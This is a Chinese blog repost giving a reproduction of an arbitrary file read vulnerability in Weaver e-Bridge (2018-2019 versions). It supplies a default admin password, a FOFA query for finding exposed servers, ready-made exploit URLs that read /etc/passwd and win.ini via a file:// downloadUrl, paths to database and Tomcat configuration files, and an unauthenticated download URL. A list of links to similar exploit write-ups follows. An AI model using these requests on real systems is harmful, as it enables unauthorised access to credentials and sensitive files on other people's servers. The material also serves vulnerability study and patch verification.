泛微云桥e-Bridge任意文件读取 - 代码天地

泛微云桥e-Bridge任意文件读取

其他 2021-03-30 01:14:42 阅读次数: 0

泛微云桥e-Bridge任意文件读取漏洞

0x00漏洞影响版本:
该漏洞几乎影响2018-2019全版本。
0x01漏洞利用:
默认密码sysadmin/1
fofa搜索语句:title=“泛微云桥”
在这里插入图片描述

主要成因
/wxjsapi/saveYZJFil接口获取filepath，返回数据包内出现了程序的绝对路径，攻击者可以下载相关敏感文件
构造如下语句

http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt

相关敏感文件目录

windows: d://ebridge
linux:/usr/ebridge
etc/passwd
c://windows/win.ini
d://ebridge/tomcat/conf/server.xml
d://ebridge/mysql/my.ini d://ebridge/tomcat/webapps/ROOT/WEB-INF/classes/init.properties

获取id值
在这里插入图片描述

通过id值获取文件内容

http://x.x.x.x/file/fileNoLogin/cf1b577f21ad41199b82d983c89bfd05

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_44146996/article/details/110290574

泛微云桥e-Bridge任意文件读取

泛微云桥e-Bridge安装手册

泛微云桥e-Bridge 授权破解方法

漏洞复现-泛微云桥 e-Bridge SQL注入（附漏洞检测脚本）

泛微OA云桥未授权任意文件读取

任意文件读取

复现泛微OA e-cology XXE 漏洞（0day）——可读取任意文件

【漏洞复现】泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现

Confluence任意文件读取

MYSQl任意文件读取

GlassFish 任意文件读取

任意文件下载(读取)

【漏洞预警】泛微E-mobile v9.5任意文件上传漏洞

泛微E-Office任意文件上传漏洞复现（HW0day）

【严重】泛微 e-cology ＜10.58.3 任意文件上传漏洞

漏洞复现-泛微OA xmlrpcServlet接口任意文件读取漏洞（附漏洞检测脚本）

Resin任意文件读取漏洞

Atlassian Confluence任意文件读取漏洞

任意文件读取下载漏洞

feifeicms后台任意文件读取

Windows任意文件读取漏洞

Jenkins 任意文件读取漏洞分析

任意文件读取/下载漏洞

metinfo 6.0 任意文件读取漏洞

php协议任意文件读取

springMVC 任意文件读取相关路径

任意文件读取与下载漏洞

VAuditDemo-任意文件读取

ffmpeg 任意文件读取漏洞环境

windows 任意文件读取漏洞复现

今日推荐

周排行

成为C++高手之宏与枚举

在CAD二次开发中使用进度条

Js插件ECharts，HighCharts学习网址整理

Celery提交任务出错(on windows.)

cephfs内核客户端性能追踪

thinkphp中PHPExcel用法

EntityFramework动态组合多排序字段

汇编语言（八）实验9 根据材料编程

安装ubuntu后必须做的事情（对我而言）

JS函数式编程

每日归档

更多

2024-10-22(0)

2024-10-21(0)

2024-10-20(0)

2024-10-19(0)

2024-10-18(0)

2024-10-17(0)

2024-10-16(0)

2024-10-15(0)

2024-10-14(0)

2024-10-13(0)